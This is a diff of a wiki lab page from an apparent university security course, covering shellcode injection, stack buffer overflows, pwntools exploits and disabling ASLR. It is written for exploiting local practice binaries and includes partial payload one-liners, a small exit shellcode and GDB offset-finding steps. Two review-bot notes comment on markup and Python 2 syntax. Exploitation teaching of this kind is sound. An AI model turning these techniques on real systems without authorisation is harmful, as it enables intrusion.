session:08 [2018/07/03 16:18] Razvan Deaconescu |
session:08 [2020/07/19 12:49] (current) |
Line 1: | Line 1: | ||
- | ====== | + | ====== |
===== Resources ===== | ===== Resources ===== | ||
- | [[http:// | + | /*[[http:// |
+ | |||
+ | [[https:// | ||
[[http:// | [[http:// | ||
- | |||
- | /* | ||
===== Reminder: Shellcode ===== | ===== Reminder: Shellcode ===== | ||
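Review bot: the new revision opens a DokuWiki comment with `/*[[http://` on the first resource line, but no closing `*/` is visible in this hunk, and the old revision's standalone `/*` line further down is removed; confirm the comment is closed before the `[[https://` link that follows, otherwise that link (and anything up to the next `*/`) is hidden from the rendered page.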
Line 19: | Line 19: | ||
- Inject the shellcode into the memory address space of the vulnerable process. This is fed through some form of input to the process (standard input, program arguments, sockets, I/O, environment variables etc.). | - Inject the shellcode into the memory address space of the vulnerable process. This is fed through some form of input to the process (standard input, program arguments, sockets, I/O, environment variables etc.). | ||
- Trigger the running of the shellcode by jumping to the shellcode address, usually done through a buffer overflow. | - Trigger the running of the shellcode by jumping to the shellcode address, usually done through a buffer overflow. | ||
+ | |||
+ | ===== 1. Tutorial: Shellcode Running ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | '' | ||
+ | < | ||
+ | $ make print | ||
+ | \xbb\x2a\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80 | ||
+ | </ | ||
+ | |||
+ | The shellcode is already part of '' | ||
+ | <code c> | ||
+ | void (*func_ptr)(void) = (void (*)(void)) shellcode; | ||
+ | func_ptr(); | ||
+ | </ | ||
+ | |||
+ | This is possible due to making the data section executable when linking the '' | ||
+ | |||
+ | You can check it works properly by running it and checking the return code: | ||
+ | < | ||
+ | $ ./vuln | ||
+ | Nice function at 0x8048510 | ||
+ | $ echo $? | ||
+ | 42 | ||
+ | </ | ||
+ | |||
+ | You can also check that by running the '' | ||
+ | < | ||
+ | $ strace ./vuln | ||
+ | execve(" | ||
+ | strace: [ Process PID=11063 runs in 32 bit mode. ] | ||
+ | [...] | ||
+ | write(1, "Nice function at 0x8048510\n", | ||
+ | ) = 27 | ||
+ | exit(42) | ||
+ | +++ exited with 42 +++ | ||
+ | </ | ||
+ | |||
+ | ===== 2. Challenge: exec Shellcode ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | Find a proper shellcode in the [[http:// | ||
+ | |||
+ | ===== 3. Challenge: exec Shellcode (x86_64) ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | Find a proper shellcode in the [[http:// | ||
+ | |||
+ | ===== 4. Challenge: Shellcode as Argument ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | Feed the '' | ||
+ | |||
+ | ===== 5. Challenge: Shellcode at Standard Input ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | Feed the '' | ||
+ | < | ||
+ | cat <(python -c 'print " | ||
+ | </ | ||
+ | |||
+ | ===== 6. Tutorial: Buffer Overflow ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | The '' | ||
+ | <code c> | ||
+ | char input[64]; | ||
+ | fgets(input, | ||
+ | </ | ||
+ | |||
+ | We want to call the function '' | ||
+ | - Find the address of the '' | ||
+ | - Determine the offset from the start of the buffer to the place storing the function return address. | ||
+ | - Create a payload that overwrites the return address with the address of the win function. | ||
+ | |||
+ | We find the address of the '' | ||
+ | < | ||
+ | $ nm vuln | grep win | ||
+ | 00000000004005b7 t win | ||
+ | </ | ||
+ | |||
+ | We determine the offset from the start of the buffer to the place storing the function return address by using GDB PEDA doing the following steps: | ||
+ | - Run the program under GDB with '' | ||
+ | - Create a cyclic pattern using '' | ||
+ | - Run the program using '' | ||
+ | - Feed the cyclic pattern to it (copy-paste). | ||
+ | - Extract the substring value from '' | ||
+ | - Get the offset from the start of the buffer to the saved RBP using '' | ||
+ | - Add 8 to the offset (the size of saved RBP) to determine the offset from the start of the buffer to the place storing the function return address. | ||
+ | |||
+ | We create the payload by using Python: | ||
+ | < | ||
+ | python -c 'print " | ||
+ | </ | ||
+ | where: | ||
+ | - '' | ||
+ | - '' | ||
+ | |||
+ | We exploit the program by feeding the input to the '' | ||
+ | < | ||
+ | python -c 'print " | ||
+ | </ | ||
+ | |||
+ | The exploit script is in '' | ||
+ | < | ||
+ | $ ./ | ||
+ | Have a number: 50 | ||
+ | Hello! Gimme input: Glad to meet you! | ||
+ | Congrats! | ||
+ | ./ | ||
+ | 11653 Segmentation fault | ../src/vuln | ||
+ | </ | ||
+ | The printing of the '' | ||
+ | |||
+ | ===== 7. Challenge: Buffer Overflow ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | Similarly to the tutorial in '' | ||
+ | |||
+ | ===== 8. Challenge: Buffer Overflow ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | Similarly to the tutorial in '' | ||
+ | |||
+ | ===== 9. Challenge: Buffer Overflow and Shellcode ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | Exploit the buffer overflow in the '' | ||
+ | |||
+ | ===== 10. Tutorial: Buffer Overflow in pwntools ===== | ||
+ | |||
+ | Go to '' | ||
+ | |||
+ | We use [[https:// | ||
+ | |||
+ | The '' | ||
+ | |||
+ | Check the [[http:// | ||
+ | |||
+ | ===== 11. Challenge: Buffer Overflow in pwntools ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | Create a '' | ||
+ | |||
+ | ===== 12. Challenge: Buffer Overflow and No Code in pwntools ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | Create a '' | ||
+ | |||
+ | ===== 13. Tutorial: Buffer Overflow and Shellcode in pwntools ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | This tutorial uses pwntools to craft a shellcode and then feed it to the program while also creating a buffer overflow payload. Go through it, see what it does. | ||
+ | |||
+ | Check the [[http:// | ||
+ | |||
+ | ===== 14. Challenge: Your Turn ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | Create a simple C program using a buffer overflow and able to store a shellcode into a global (data) variable. Compile it both for 32 and 64 bits. Then create exploits for them using '' | ||
+ | |||
+ | Create your simple C program in '' | ||
+ | |||
+ | The '' | ||
+ | |||
+ | ===== 15. Tutorial: Shellcode on Stack ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | We often use the stack to store the shellcode. That's what we use now. | ||
+ | |||
+ | For that to happen easily we need to disable ASLR using '' | ||
+ | < | ||
+ | $ setarch x86_64 -R /bin/bash | ||
+ | |||
+ | $ ldd vuln | ||
+ | linux-vdso.so.1 (0x00007ffff7ffb000) | ||
+ | libc.so.6 => / | ||
+ | / | ||
+ | $ ldd vuln | ||
+ | linux-vdso.so.1 (0x00007ffff7ffb000) | ||
+ | libc.so.6 => / | ||
+ | / | ||
+ | </ | ||
+ | |||
+ | Then we go into GDB and determine the offset and at the same time find the buffer address: | ||
+ | < | ||
+ | $ gdb ./vuln | ||
+ | </ | ||
+ | Use '' | ||
+ | |||
+ | In the '' | ||
+ | |||
+ | <note important> | ||
+ | To reenable ASLR, simply exit the shell you created using '' | ||
+ | </ | ||
+ | |||
+ | ===== 16. Challenge: io.netgarage.io level05 ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | It's a buffer overflow that may end up calling a shellcode placed on the stack buffer. | ||
+ | |||
+ | Create a '' | ||
+ | |||
+ | <note tip> | ||
+ | Use the '' | ||
+ | </ | ||
+ | |||
+ | <note important> | ||
+ | Disable ASLR using '' | ||
+ | </ | ||
+ | |||
+ | ===== 17. Challenge: Shellcode on Stack ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | Update the '' | ||
+ | |||
+ | ===== 18. Challenge: Shellcode on Stack (32 bit) ===== | ||
+ | |||
+ | Go to the '' | ||
+ | |||
+ | It's similar to the challenge above, except that it runs on 32 bits. Copy and update the '' | ||
+ | |||
+ | /* | ||
==== 10.b. Challenge: Buffer is too small: Use another buffer for storing the shellcode ==== | ==== 10.b. Challenge: Buffer is too small: Use another buffer for storing the shellcode ==== |
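Review bot: the payload one-liners at `cat <(python -c 'print "` and `python -c 'print "` depend on Python 2 semantics (a `print` statement and `str` as raw bytes); with a Python 3 `python` they are a syntax error, and even after adding parentheses `print` would emit UTF-8 text rather than the intended raw bytes, so the tutorial should call `python2` explicitly or write the bytes via `sys.stdout.buffer.write`. Separately, the strace excerpt `write(1, "Nice function at 0x8048510\n",` followed by `) = 27` is split across two lines; join them so the call and its return value read together.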